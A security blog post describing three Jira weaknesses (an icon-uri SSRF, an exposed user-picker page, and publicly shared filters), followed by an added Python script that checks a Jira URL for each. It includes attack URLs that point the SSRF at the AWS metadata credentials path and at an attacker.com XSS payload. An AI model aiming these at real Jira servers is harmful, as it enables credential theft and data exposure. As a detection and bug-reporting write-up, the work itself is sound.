3 Ways in which Jira Instances Can be Exploited

March 19, 2019


What is Jira?
Jira is an issue-tracking product developed by Atlassian for bug tracking and agile project management. It is used by a large number of companies, big and small, to track their issues.
Jira's popularity has made it a major target for attackers. Below are three ways in which a misconfigured or unpatched Jira instance can be compromised.
1. XSS via SSRF
Jira versions earlier than 7.3.5 expose a server-side request forgery (SSRF) in the OAuth plugin's icon-uri servlet: the server fetches whatever URL is supplied in the consumerUri parameter and returns the response to the client. It can be used to reach internal services (for example the AWS instance metadata endpoint, to leak IAM credentials) or, because the fetched content is reflected back under the Jira origin, escalated to XSS.
For example:
https://jira.xyz.com/plugins/servlet/oauth/users/icon-uri?consumerUri=http://bing.com
If the response contains bing.com's page content, the Jira server fetched the URL on our behalf and the instance is vulnerable.
To try for AWS credentials, point consumerUri at the instance metadata service, http://169.254.169.254/latest/meta-data/iam/security-credentials/ (the role name it returns can then be appended to that path to fetch the temporary keys).
If nothing useful is reachable internally, host a page containing a script payload and reference it from the parameter to trigger XSS in the Jira origin:
https://jira.xyz.com/plugins/servlet/oauth/users/icon-uri?consumerUri=http://attacker.com/xss
2. UserPickerBrowser.jspa
If a Jira instance serves https://jira.xyz.com/secure/popups/UserPickerBrowser.jspa to an unauthenticated visitor, it exposes the full list of internal users, along with their email addresses, to anyone on the Internet. This bug was recently used to find internal employee details in a NASA Jira instance.
In later versions of Jira, Atlassian patched this by requiring unauthenticated users to log in first.
3. Data Leak via Filters
Saved filters have a sharing option labelled "Public". Users sometimes assume this means visible to everyone inside the company's Jira, but it actually means visible to the public, i.e. to any unauthenticated user.
Employees may unknowingly leak company data through filter names, the JQL behind them and the issue summaries those filters return.
Some examples are:
https://jira.xyz.com/secure/ConfigurePortalPages!default.jspa?view=popular
https://jira.xyz.com/secure/ManageFilters.jspa?filterView=search&Search=Search&filterView=search&sortColumn=favcount&sortAscending=false
In later versions the sharing options were expanded, and "Shared with everyone" (all logged-in users) is kept distinct from "Shared with public"; the default can be changed in the sharing settings for Jira filters and dashboards.
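The following script ties the three checks above together against one Jira base URL, requesting each endpoint as an unauthenticated visitor and deciding from the response whether the exposure is present. It is an added example, not code from the original article or from Atlassian. The canary URL and marker string (you would have to host that page yourself), the login-page hints used to recognise a bounce to login.jsp, and the email and filter-link patterns are assumptions; the sample responses at the bottom are constructed so the decision logic can be exercised offline.

```python
"""Triage the three Jira exposures described above against one base URL.

Added example, not code from the original article or from Atlassian. Canary
URL, marker string, login-page hints and HTML patterns are assumptions.
"""
import re
import sys
import urllib.error
import urllib.request
from urllib.parse import urlencode

# Assumed: a host you control that serves a page containing MARKER, so that a
# reflected response proves Jira fetched it server-side.
CANARY_URL = "http://canary.example.net/probe"
MARKER = "JIRA-SSRF-CANARY-7f3a"

# Jira's login form uses these; urlopen follows a 302 to login.jsp, so their
# presence in the body means we were bounced to login rather than served the page.
LOGIN_HINTS = ("os_username", "login.jsp")


def ssrf_probe_url(base_url, target=CANARY_URL):
    """icon-uri servlet URL asking Jira to fetch `target` for us (section 1)."""
    query = urlencode({"consumerUri": target})
    return base_url.rstrip("/") + "/plugins/servlet/oauth/users/icon-uri?" + query


def userpicker_url(base_url):
    """User browser popup that should require a login (section 2)."""
    return base_url.rstrip("/") + "/secure/popups/UserPickerBrowser.jspa"


def public_filters_url(base_url):
    """Filter listing sorted by favourite count (section 3)."""
    query = urlencode({"filterView": "search", "Search": "Search",
                       "sortColumn": "favcount", "sortAscending": "false"})
    return base_url.rstrip("/") + "/secure/ManageFilters.jspa?" + query


def looks_like_login(body):
    return any(hint in body for hint in LOGIN_HINTS)


def ssrf_reflected(status, body, marker=MARKER):
    """True when the server fetched our canary and echoed its content back."""
    return status == 200 and marker in body


def exposed_users(status, body):
    """Email addresses an unauthenticated client can read off the user picker."""
    if status != 200 or looks_like_login(body):
        return []
    return sorted(set(re.findall(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+", body)))


def exposed_filters(status, body):
    """Filter IDs listed to an unauthenticated client (links like /issues/?filter=NNN)."""
    if status != 200 or looks_like_login(body):
        return []
    return sorted(set(re.findall(r"[?&]filter=(\d+)", body)), key=int)


def fetch(url):
    """GET with no cookies, i.e. as an unauthenticated visitor; returns (status, body)."""
    req = urllib.request.Request(url, headers={"User-Agent": "jira-exposure-check"})
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


# Constructed sample responses (not captured from any real instance) so the
# checks can be exercised offline.
SAMPLE_SSRF_BODY = "<html><body>" + MARKER + "</body></html>"
SAMPLE_LOGIN_BODY = '<form action="/login.jsp"><input name="os_username"></form>'
SAMPLE_USERS_BODY = ("<table><tr><td>alice</td><td>alice@corp.example</td></tr>"
                     "<tr><td>bob</td><td>bob@corp.example</td></tr></table>")
SAMPLE_FILTERS_BODY = ('<a href="/issues/?filter=10042">Q1 roadmap</a>'
                       '<a href="/issues/?filter=10007">Customer escalations</a>')

if __name__ == "__main__":
    if len(sys.argv) < 2:
        sys.exit("usage: jira_exposure_check.py https://jira.example.com")
    base = sys.argv[1]
    status, body = fetch(ssrf_probe_url(base))
    print("icon-uri SSRF:", "canary reflected" if ssrf_reflected(status, body) else "no echo")
    status, body = fetch(userpicker_url(base))
    print("UserPickerBrowser emails:", exposed_users(status, body)[:10] or "not exposed")
    status, body = fetch(public_filters_url(base))
    print("public filter IDs:", exposed_filters(status, body)[:10] or "not exposed")
```

Two caveats when reading the output. The SSRF probe only reports "canary reflected" if the Jira server has egress to your canary host, so "no echo" on a host with outbound filtering does not prove the instance is patched; a second probe against an internal address such as the metadata service may still succeed. The email and filter regexes are deliberately loose heuristics: Jira can be configured to hide user emails, and a public filter list rendered through a different template may need the pattern adjusted, so treat an empty list as "nothing matched", not "nothing exposed".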
Most sites remain in the dark about such bugs. I have personally found many misconfigured Jira instances. However, not all companies will accept such bugs until we can show solid evidence that internal data is leaking.
